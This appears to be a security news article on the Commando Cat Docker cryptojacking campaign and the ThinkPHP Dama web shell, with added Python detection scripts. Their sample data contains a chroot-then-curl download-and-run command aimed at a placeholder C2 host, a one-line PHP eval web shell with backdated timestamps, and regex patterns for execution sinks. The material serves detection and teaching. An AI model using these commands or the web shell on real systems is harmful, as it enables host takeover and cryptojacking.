The threat actor tracked as Commando Cat has been linked to an ongoing cryptojacking campaign that abuses poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
"The attackers used the cmd.cat/chattr docker image container that retrieves the payload from their own command-and-control (C&C) infrastructure," Trend Micro researchers Sunil Bharti and Shubham Singh said in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando project to generate a benign container, was first documented earlier this year by Cado Security.
The attacks target misconfigured Docker Remote API servers, in practice daemons whose API is reachable over the network without authentication, so that anyone who can reach the port can pull images and create containers. The attackers use that access to deploy a Docker image named cmd.cat/chattr, instantiate a container from it, and then break out of the container's confines using the chroot command to gain access to the host operating system.
The final step retrieves the malicious miner binary from a C&C server ("leetdbs.anondns[.]net/z") with a curl or wget command run from a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on the Kaiten (aka Tsunami) malware.
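The sequence above (host escape via chroot from a container created through the Docker API, then a curl/wget fetch of the payload) leaves a recognisable footprint in the container's own configuration. The script below is an added example, not code from Trend Micro, Cado Security or the campaign, and it assumes the common form of this escape: the host's root filesystem is bind-mounted into the container (for instance `-v /:/host`) and `chroot` is then run on that path. It takes container records in the shape of `docker inspect` output (a subset of fields is enough) and flags the known-abused image name from the article, a host root bind mount, a privileged flag, a `chroot` invocation and a downloader pointed at a URL. The two sample records are constructed for illustration, not captured from a real host.

```python
"""Triage Docker containers for the host-escape pattern described above.

Added example, not code from Trend Micro, Cado Security or the campaign.
Assumption: the escape bind-mounts the host root ("/") into the container
and runs chroot on it. Records follow the `docker inspect` shape; the two
samples at the bottom are constructed, not captured.
"""
import shlex

# Image name taken from the article; the rest of this file is a generic heuristic.
KNOWN_ABUSED_IMAGES = {"cmd.cat/chattr"}
DOWNLOADERS = {"curl", "wget"}


def host_root_binds(container):
    """Container paths at which the host's root filesystem ("/") is mounted."""
    hits = set()
    for bind in (container.get("HostConfig") or {}).get("Binds") or []:
        src, _, rest = bind.partition(":")          # "src:dst[:opts]"
        if src == "/" and rest:
            hits.add(rest.split(":")[0])
    for mount in container.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source") == "/":
            hits.add(mount.get("Destination", ""))
    return sorted(hits)


def flatten_command(parts):
    """Recursively split `sh -c '...'` style arguments into individual words."""
    words = []
    for part in parts:
        try:
            sub = shlex.split(part)
        except ValueError:                          # unbalanced quotes: keep raw token
            sub = [part]
        if len(sub) > 1:
            words.extend(flatten_command(sub))
        else:
            words.append(part)
    return words


def assess(container):
    """Return human-readable findings for one container; empty means nothing matched."""
    cfg = container.get("Config") or {}
    hostcfg = container.get("HostConfig") or {}
    findings = []
    if cfg.get("Image") in KNOWN_ABUSED_IMAGES:
        findings.append(f"image {cfg['Image']} matches a known-abused image")
    roots = host_root_binds(container)
    if roots:
        findings.append("host root filesystem bind-mounted at " + ", ".join(roots))
    if hostcfg.get("Privileged"):
        findings.append("container runs privileged")
    words = flatten_command((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    if "chroot" in words:
        findings.append("command invokes chroot")
    tools = sorted({w for w in words if w in DOWNLOADERS})
    urls = [w for w in words if w.startswith(("http://", "https://"))]
    if tools and urls:
        findings.append(f"command fetches {', '.join(urls)} with {', '.join(tools)}")
    return findings


def triage(containers):
    """Map container name -> findings for every container that tripped a check."""
    result = {}
    for c in containers:
        hits = assess(c)
        if hits:
            result[c.get("Name", "?").lstrip("/")] = hits
    return result


# Constructed sample records (subset of `docker inspect` fields). The C2 host is a
# placeholder, not the one named in the article.
SAMPLE_CONTAINERS = [
    {
        "Name": "/angry_cat",
        "Config": {
            "Image": "cmd.cat/chattr",
            "Cmd": ["sh", "-c",
                    "chroot /host sh -c 'curl -s http://c2.example.invalid/z -o /tmp/z "
                    "&& chmod +x /tmp/z && /tmp/z'"],
        },
        "HostConfig": {"Binds": ["/:/host"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}],
    },
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/www",
                    "Destination": "/usr/share/nginx/html"}],
    },
]

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_CONTAINERS).items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

Feeding it real data is a matter of `docker inspect $(docker ps -aq)` piped through `json.load`. The host root bind mount is the check worth keeping even if the image name changes: a container that mounts `/` has no meaningful isolation left, whatever command it runs.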
"The significance of this attack campaign lies in its use of Docker images to deploy cryptojacking scripts on compromised systems," the researchers said. "This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software."
The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP applications (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-speaking threat actor to deliver a web shell dubbed Dama as part of a campaign that has been underway since October 17, 2023.
"The exploit attempts to retrieve additional obfuscated code from another compromised ThinkPHP server to gain initial foothold," Akamai researchers Ron Mankivsky and Maxim Zavodchik said. "After successfully exploiting the system, the attackers will install a Chinese language web shell named Dama to maintain persistent access to the server."
The web shell is equipped with several advanced capabilities: collecting system data, uploading files, scanning network ports, escalating privileges, and navigating the file system. The last of these lets the threat actors edit and delete files and modify their timestamps, so that a freshly dropped shell blends in with the surrounding application code.
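The timestamp trick is only half effective on a typical Linux host: `touch` and the `utime` family can set a file's modification time to anything, but the inode change time (ctime) is written by the kernel and moves forward on every metadata change, so a backdated web shell still shows a recent ctime. The scan below is an added example, not Akamai's detection logic and not the Dama shell itself. It walks a PHP web root, flags files containing execution sinks fed from request parameters, and flags files whose mtime is far older than their ctime. The second signal on its own is noisy (`cp -p` and package installs produce the same gap), which is why the two are reported together. The mini web root it scans is constructed in a temporary directory.

```python
"""Sweep a PHP web root for the web-shell indicators discussed above.

Added example, not Akamai's code or the Dama web shell. Assumption: a
backdated mtime cannot be matched by a backdated ctime without kernel or
raw-disk access, so a large ctime-minus-mtime gap is worth a look when the
file also contains shell-like code. The sample tree is constructed here.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Typical web-shell ingredients: a code-execution sink and request-driven input.
SUSPICIOUS_PHP = re.compile(
    rb"\b(?:eval|assert|system|passthru|shell_exec|proc_open|popen)\s*\("
    rb"|base64_decode\s*\("
    rb"|\$_(?:GET|POST|REQUEST|COOKIE)\s*\[",
    re.I,
)


def timestamp_gap(st):
    """Seconds by which ctime is later than mtime; large values suggest timestomping."""
    return st.st_ctime - st.st_mtime


def scan_php_tree(root, gap_threshold=3600):
    """Return {relative_posix_path: [reasons]} for every .php file that trips a check."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        reasons = []
        if SUSPICIOUS_PHP.search(path.read_bytes()):
            reasons.append("execution sink or request-parameter use")
        gap = timestamp_gap(path.stat())
        if gap > gap_threshold:
            reasons.append(f"mtime predates ctime by {int(gap)}s")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_tree():
    """Constructed mini web root: one ordinary controller and one backdated shell."""
    root = Path(tempfile.mkdtemp(prefix="phpscan-"))
    controller = root / "application" / "index" / "controller" / "Index.php"
    controller.parent.mkdir(parents=True)
    controller.write_text(
        "<?php\nnamespace app\\index\\controller;\n"
        "class Index { public function index() { return 'hello'; } }\n"
    )
    shell = root / "public" / "upload" / "cache.php"
    shell.parent.mkdir(parents=True)
    shell.write_text("<?php @eval(base64_decode($_POST['cmd'])); ?>\n")
    # Attacker-style backdating: atime/mtime go back two years, ctime stays "now".
    two_years_ago = time.time() - 2 * 365 * 86400
    os.utime(shell, (two_years_ago, two_years_ago))
    return root


if __name__ == "__main__":
    for rel, reasons in scan_php_tree(build_sample_tree()).items():
        print(rel)
        for reason in reasons:
            print("  -", reason)
```

Point it at a real web root with `scan_php_tree("/var/www/html")`. Files that trip only the timestamp check deserve a look at the package manager's manifest before anyone panics; files that trip both checks rarely have an innocent explanation.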
"The recent attacks originated by a Chinese-speaking adversary highlight an ongoing trend of attackers using a fully fledged web shell, designed for advanced victim control," the researchers noted. "Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems."